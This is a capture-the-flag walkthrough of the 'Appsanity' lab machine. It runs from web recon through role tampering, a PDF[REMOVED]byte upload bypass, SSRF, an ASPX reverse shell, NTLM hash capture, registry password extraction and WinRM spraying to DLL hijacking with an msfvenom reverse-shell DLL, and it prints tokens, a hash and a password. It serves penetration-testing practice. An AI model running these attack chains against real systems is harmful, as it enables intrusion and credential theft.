Appsanity
Recon
HTTPs (443)
HTTP redirects to HTTPs
We can sign up as Patient.
Passive recon of subdomain enumeration returned nothing for HTTP, but there's subdomain for HTTPs
└─$ domain='meddigi.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 2
└─$ domain='meddigi.htb'; ffuf -k -u "https://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 7
portal [Status: 200, Size: 2976, Words: 1219, Lines: 57, Duration: 375ms]Our token
Become Doctor
When we sign up we have hidden field attached to form called Acctype which by default is 1, changing to 0 doesn't create account and 2 is Doctor.
Now we are a Doctor
When we try to add ourselves (patient account) in request we are ID of 7, changing ID doesn't show anything in response.
Portal
Let's visit the subdomain
└─$ feroxbuster -u 'https://portal.meddigi.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -D -C 400,404 -S 155,324 -k --smart
by Ben "epi" Risher 🤓 ver: 2.10.3
405 GET 29l 107w 1293c https://portal.meddigi.htb/Login/Signin
200 GET 57l 162w 2976c https://portal.meddigi.htb/Login
200 GET 57l 162w 2976c https://portal.meddigi.htb/Login/Index
200 GET 8l 14w 194c https://portal.meddigi.htb/error
200 GET 1l 21w 14304c https://portal.meddigi.htb/favicon.ico
302 GET 0l 0w 0c https://portal.meddigi.htb/Login/logout => https://portal.meddigi.htb/
302 GET 0l 0w 0c https://portal.meddigi.htb/profile => https://portal.meddigi.htb/Login
405 GET 29l 107w 1293c https://portal.meddigi.htb/Login/signin
[####################] - 21s 9675/9675 0s found:19 errors:0
[####################] - 21s 4769/4769 231/s https://portal.meddigi.htb/
[####################] - 18s 4769/4769 272/s https://portal.meddigi.htb/Login/ The login urls are somewhat same and in the requests we don't have cookies from main domain to this domain. If we go back to main domain, change the access_token domain scope to .meddigi.htb (note the dot) we will get this cookie on all subdomains.
Go back to the portal, refresh and voila! We are logged in as Doctor.
Upload Bypass
https://portal.meddigi.htb/examreport let's us upload files, but only PDFs.
During upload we can add magic bytes to detect this file as PDF
And we get Examination report sent to the management.
Run passive recon to find where it gets uploaded ; Nothing interesting
└─$ feroxbuster -u 'https://portal.meddigi.htb/' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -D -C 400,404 -S 155,324 -k --thorough -b 'access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6InRlc3QwM0BtZWRkaWdpLmh0YiIsIm5iZiI6MTczMzUxMDMxNCwiZXhwIjoxNzMzNTEzOTE0LCJpYXQiOjE3MzM1MTAzMTQsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.ku_cPHpnCl-DtjxaA2mMMBSo4Bx4ZiuUYKPauMQEyF8' -I .js,.css,.png
200 GET 8l 14w 194c https://portal.meddigi.htb/error
200 GET 299l 847w 14600c https://portal.meddigi.htb/examreport
200 GET 205l 553w 10059c https://portal.meddigi.htb/Scheduler
200 GET 237l 628w 12236c https://portal.meddigi.htb/Equipment
200 GET 148l 485w 9462c https://portal.meddigi.htb/Profile
200 GET 349l 1067w 17935c https://portal.meddigi.htb/Prescriptions
200 GET 148l 485w 9462c https://portal.meddigi.htb/profile
200 GET 8l 14w 194c https://portal.meddigi.htb/Error
405 GET 29l 107w 1293c https://portal.meddigi.htb/Equipment/EquipmentRequest
200 GET 237l 628w 12236c https://portal.meddigi.htb/equipment
405 GET 29l 107w 1293c https://portal.meddigi.htb/Scheduler/Schedule
200 GET 205l 553w 10059c https://portal.meddigi.htb/scheduler
405 GET 29l 107w 1293c https://portal.meddigi.htb/Prescriptions/SendEmail
200 GET 44l 87w 1792c https://portal.meddigi.htb/Prescriptions/ViewPrescription/2
405 GET 29l 107w 1293c https://portal.meddigi.htb/Prescriptions/AddPrescription
200 GET 44l 87w 1780c https://portal.meddigi.htb/Prescriptions/ViewPrescription/1
200 GET 349l 1067w 17935c https://portal.meddigi.htb/prescriptions
[####################] - 4m 179058/179058 668/s https://portal.meddigi.htb/ SSRF
Meanwhile in Prescriptions we have SSRF
Port 80 has response after ages... but all others have delay of 2 seconds.
└─$ ffuf -request ssrf.req -w <(seq 79 81) -mc all -k -t 10 -timeout 100000
v2.1.0-dev
79 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 2138ms]
81 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 2137ms]
80 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 21148ms]We can filter by time
└─$ ffuf -request ssrf.req -w /usr/share/seclists/Discovery/Infrastructure/common-http-ports.txt -mc all -k -t 10 -ft '<3000'
v2.1.0-dev
1434 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 4097ms]
4001 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 4000ms]
6346 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3994ms]
30821 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3906ms]
8080 [Status: 200, Size: 2060, Words: 688, Lines: 54, Duration: 8832ms]
SSRF to RCE
Looks like we can view reports, but our is long gone. Im actually going to change the payload to straight up reverse shell because interactive session doesn't look that bright.
└─$ curl -LOs 'https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/refs/heads/master/shell.aspx'
└─$ nano shell.aspx # Change IP:PORT
└─$ sed -i '1s/^/%PDF-\n/' shell.aspx
└─$ file shell.aspx
shell.aspx: PDF document, version \012.%Reverse Shell (svc_exampanel)
Upload -> SSRF on 8080 -> https://portal.meddigi.htb/ViewReport.aspx?file=5c7b8af3-70d9-4d94-bcfd-4fcd5dc4ca98_shell.aspx -> Change protocol, url and port => http://127.0.0.1:8080/ViewReport.aspx?file=5c7b8af3-70d9-4d94-bcfd-4fcd5dc4ca98_shell.aspx -> Get reverse shell
└─$ listen
Ncat: Connection from 10.129.146.201:63867.
c:\windows\system32\inetsrv>whoami /all
User Name SID
======================= ==============================================
appsanity\svc_exampanel S-1-5-21-4111732528-4035850170-1619654654-1007
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\ExamPanel Well-known group S-1-5-82-2916625395-3930688606-393764215-2099654449-2832396995 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ==================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledPS C:\Users\svc_exampanel> tree /f /a
Folder PATH listing
Volume serial number is F854-971D
C:.
+---Desktop
| user.txt
|
+---Documents
+---Downloads
+---Favorites
+---Links
+---Logs
| examinationpanel_log.txt
|
+---Music
+---Pictures
+---Saved Games
\---VideosUser.txt
PS C:\Users\svc_exampanel> cat Desktop/user.txt
f64ef2f5cbcc99aada5389c877c30157Privilege Escalation (devdoc)
└─$ impacket-smbserver -smb2support share .
...
[*] User APPSANITY\svc_exampanel authenticated successfully
[*] svc_exampanel::APPSANITY:aaaaaaaaaaaaaaaa:cd9f45b69047d149c99344c6483a29fa:0101000000000000000a9d521848db014d1324d1600ecc2c000000000100100064005400720042006a00710072006c000300100064005400720042006a00710072006c00020010005500720061006b006600450074007900040010005500720061006b00660045007400790007000800000a9d521848db01060004000200000008003000300000000000000000000000002000008bab6c70d6764e6ec03ffd91cb9390567266fcefeabfb3c0c175479af389f5580a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310033000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
...
---
PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> xcopy ExaminationManagement.dll \\10.10.14.113\shareDecompile the DLL https://www.decompiler.com/jar/7d19edcf2760481892228654a92d724b/ExaminationManagement.dll
It's getting some kind of decryption key from registry
PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> reg query "HKLM\Software\MedDigi"
HKEY_LOCAL_MACHINE\Software\MedDigi
EncKey REG_SZ 1g0tTh3R3m3dy!!
PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> Get-ItemProperty "Registry::HKLM\Software\MedDigi"
EncKey : 1g0tTh3R3m3dy!!
PSPath : Microsoft.PowerShell.Core\Registry::HKLM\Software\MedDigi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKLM\Software
PSChildName : MedDigi
PSProvider : Microsoft.PowerShell.Core\RegistryThis looks like a password.
Get the users
PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> net user
User accounts for \\APPSANITY
-------------------------------------------------------------------------------
Administrator DefaultAccount devdoc
Guest svc_exampanel svc_meddigi
svc_meddigiportal WDAGUtilityAccountBrute the password with wirnm, smb was not open.
└─$ netexec winrm meddigi.htb -u users.txt -p '1g0tTh3R3m3dy!!'
WINRM 10.129.146.201 5985 APPSANITY [*] Windows 10 / Server 2019 Build 19041 (name:APPSANITY) (domain:Appsanity)
WINRM 10.129.146.201 5985 APPSANITY [-] Appsanity\Administrator:1g0tTh3R3m3dy!!
WINRM 10.129.146.201 5985 APPSANITY [-] Appsanity\DefaultAccount:1g0tTh3R3m3dy!!
WINRM 10.129.146.201 5985 APPSANITY [+] Appsanity\devdoc:1g0tTh3R3m3dy!! (Pwn3d!)WinRM
└─$ evil-winrm -i meddigi.htb -u devdoc -p '1g0tTh3R3m3dy!!'
*Evil-WinRM* PS C:\Users\devdoc\Documents> whoami /all
User Name SID
================ ==============================================
appsanity\devdoc S-1-5-21-4111732528-4035850170-1619654654-1002
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledEnumerate with winpeas
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/wp.exe -out wp.exe
*Evil-WinRM* PS C:\Users\devdoc\Music> .\wp.exe | tee -filepath wp.log
--------- Autorun Applications
È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
Error getting autoruns from WMIC: System.Management.ManagementException: Access denied
at System.Management.ThreadDispatch.Start()
at System.Management.ManagementScope.Initialize()
at System.Management.ManagementObjectSearcher.Initialize()
at System.Management.ManagementObjectSearcher.Get()
at winPEAS.Info.ApplicationInfo.AutoRuns.GetAutoRunsWMIC()
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: SecurityHealth
Folder: C:\Windows\system32
File: C:\Windows\system32\SecurityHealthSystray.exe
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: VMware User Process
Folder: C:\Program Files\VMware\VMware Tools
File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and Space detected) - C:\
=================================================================================================
RegPath: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
RegPerms: devdoc [FullControl]
Key: MicrosoftEdgeAutoLaunch_52C6AD3EEF59818F619BA8CCF0498CC4
Folder: C:\Program Files (x86)\Microsoft\Edge\Application
File: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window --win-session-start /prefetch:5 (Unquoted and Space detected) - C:\
=================================================================================================
RegPath: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
RegPerms: devdoc [FullControl]
Key: OneDrive
Folder: C:\Users\devdoc\AppData\Local\Microsoft\OneDrive
FolderPerms: devdoc [AllAccess]
File: C:\Users\devdoc\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background
FilePerms: devdoc [AllAccess]
=================================================================================================
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
=================================================================================================
Folder: C:\Users\devdoc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
FolderPerms: devdoc [AllAccess]
File: C:\Users\devdoc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\devdoc\AppData\Roaming\Microsoft\Windows,C:\Users\devdoc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
FilePerms: devdoc [AllAccess]
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
=================================================================================================
--------- Enumerating Office 365 endpoints synced by OneDrive.
SID: S-1-5-21-4111732528-4035850170-1619654654-1002
Name: Business1
UserFolder C:\Users\devdoc\OneDrive
Name: Personal
UserFolder C:\Users\devdoc\OneDrive
--------- Current TCP Listening Ports
È Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 100 0.0.0.0 0 Listening 3912 ReportManagement
TCP 0.0.0.0 135 0.0.0.0 0 Listening 916 svchost
TCP 0.0.0.0 443 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 5040 0.0.0.0 0 Listening 5168 svchost
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 8080 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49664 0.0.0.0 0 Listening 684 lsass
TCP 0.0.0.0 49665 0.0.0.0 0 Listening 544 wininit
TCP 0.0.0.0 49666 0.0.0.0 0 Listening 1096 svchost
TCP 0.0.0.0 49667 0.0.0.0 0 Listening 1692 svchost
TCP 0.0.0.0 49668 0.0.0.0 0 Listening 668 services
TCP 10.129.146.201 139 0.0.0.0 0 Listening 4 System
TCP 10.129.146.201 5985 10.10.14.113 52528 Established 4 SystemThere's something running on port 80 by ReportManagement, which lives in Program Files
*Evil-WinRM* PS C:\Program Files\ReportManagement> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2023 11:33 AM Libraries
-a---- 5/5/2023 5:21 AM 34152 cryptbase.dll
-a---- 5/5/2023 5:21 AM 83744 cryptsp.dll
-a---- 3/11/2021 9:22 AM 564112 msvcp140.dll
-a---- 9/17/2023 3:54 AM 140512 profapi.dll
-a---- 10/20/2023 2:56 PM 102912 ReportManagement.exe
-a---- 10/20/2023 1:47 PM 11492864 ReportManagementHelper.exe
-a---- 3/11/2021 9:22 AM 96144 vcruntime140.dll
-a---- 3/11/2021 9:22 AM 36752 vcruntime140_1.dll
-a---- 5/5/2023 5:21 AM 179248 wldp.dllPrivilege Escalation (Administrator)
We only have access to ReportManagement.exe
*Evil-WinRM* PS C:\Program Files\ReportManagement> xcopy ReportManagement* \\10.10.14.113\share
C:ReportManagement.exe
C:ReportManagementHelper.exe
xcopy.exe : Access denied
+ CategoryInfo : NotSpecified: (Access denied:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError└─$ ghidra_auto -c ReportManagement.exe
[*] File Ouput:
PE32+ executable (GUI) x86-64
for MS Windows
6 sections
...
└─$ strings ReportManagement.exe -n 10
C:\inetpub\ExaminationPanel\ExaminationPanel\Reports
C:\Users\Administrator\Backup
reportmanagement_log.txt
Failed to receive data from client.
Available Commands:
backup: Perform a backup operation.
validate: Validates if any report has been altered since the last backup.
recover <filename>: Restores a specified file from the backup to the Reports folder.
upload <external source>: Uploads the reports to the specified external source.
Backup operation completed successfully.
An error occurred during the backup operation.
Invalid command. Missing parameter after 'upload'. Type 'help' for available commands.
C:\Program Files\ReportManagement\Libraries
externalupload
Failed to upload to external source.
Attempting to upload to external source.
Invalid command. Type 'help' for available commands.
An error occurred while processing the upload command.
(Hash mismatch)
Altered file found:
(Hash file not found)
Validation completed.
Validation completed. All reports are intact.
An error occurred during the validation operation.
Validation failed
Invalid command. Missing filename after 'recover'. Type 'help' for available commands.
File successfully recovered from backup.
The file appears to be tampered with and cannot be recovered.
Specified file not found in the backup directory.
Failed to initialize Winsock.
Failed to create socket.
Failed to bind socket.
Failed to accept incoming connection.
Reports Management administrative console. Type "help" to view available commands.
invalid string position
vector too long
unknown error
create_directory
was not found.
Source directory
Error: Directory not found.
Access denied when trying to create directory
Failed to create hash file for
Filesystem error occurred during backup.
Error Details:
Error occurred during backup.
...From the strings if we had to make a rough guess, it's probably loading DLLs from C:\\Program Files\\ReportManagement\\Libraries
*Evil-WinRM* PS C:\Users\devdoc\Documents> ls 'C:\\Program Files\\ReportManagement\\Libraries'
*Evil-WinRM* PS C:\Users\devdoc\Documents> Get-ACL 'C:\\Program Files\\ReportManagement\\Libraries' | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\ReportManagement\Libraries
Owner : BUILTIN\Administrators
Group : APPSANITY\None
Access : APPSANITY\devdoc Allow Write, ReadAndExecute, Synchronize
BUILTIN\Administrators Allow FullControl
CREATOR OWNER Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow Read, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-4111732528-4035850170-1619654654-513D:AI(A;OICI;0x1201bf;;;S-1-5-21-4111732528-4035850170-1619654654-1002)(A;ID;FA;;;BA)(A;OICIIOID;FA;;;CO)(A;OICIID;FA;;;SY)(A;OICIIOID;FA;;;BA)(A;OICIID;FR;;;BU)(A;CIID;FA;;;S-1-5-80-9560088
85-3418522649-1831038044-1853292631-2271478464)(A;OICIID;0x1200a9;;;AC)(A;OICIID;0x1200a9;;;S-1-15-2-2)
*Evil-WinRM* PS C:\Users\devdoc\Documents> cd 'C:\\Program Files\\ReportManagement\\Libraries'
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> echo x > x
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> ls
Directory: C:\Program Files\ReportManagement\Libraries
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/6/2024 11:51 PM 8 xThe directory is empty and we have write access to it.
└─$ cp /usr/share/windows-resources/binaries/nc.exe .
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f dll -o rev.dll
---
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> curl 10.10.14.113/rev.dll -out 'C:\Program Files\ReportManagement\Libraries\externalupload.dll'
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> cd $ENV:USERPROFILE/Music
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/nc.exe -out nc.exenetcat was dying on evil-winrm and not letting me to interact with program, plain reverse shell was also dying so I had to port forward.
└─$ chisel server -p 36000 --reverse
2024/12/07 03:10:00 server: Reverse tunnelling enabled
2024/12/07 03:10:00 server: Fingerprint DsmwtKJ8wgC3MRRu+CQx0Hi3vXD7gk4sO/sUkZnwSeY=
2024/12/07 03:10:00 server: Listening on http://0.0.0.0:36000
---
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/chisel.exe -outfile chisel.exe
*Evil-WinRM* PS C:\Users\devdoc\Music> Start-Job -ScriptBlock { & "C:\Users\devdoc\Music\chisel.exe" client 10.10.14.113:36000 R:100:127.0.0.1:100; }
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/rev.dll -out 'C:\Program Files\ReportManagement\Libraries\externalupload2.dll'
---
└─$ nc 0 100
Reports Management administrative console. Type "help" to view available commands.
upload externalupload2
Attempting to upload to external source.
Attempting to upload to external source.Scratch the filename, it seems as long as DLL is in the folder then it can be loaded. I messed up the filename, so externalupload2 worked too.
Root.txt
C:\Users\Administrator>type \Users\Administrator\Desktop\root.txt
30e84cb378a0d10561d8a130c932509aLast updated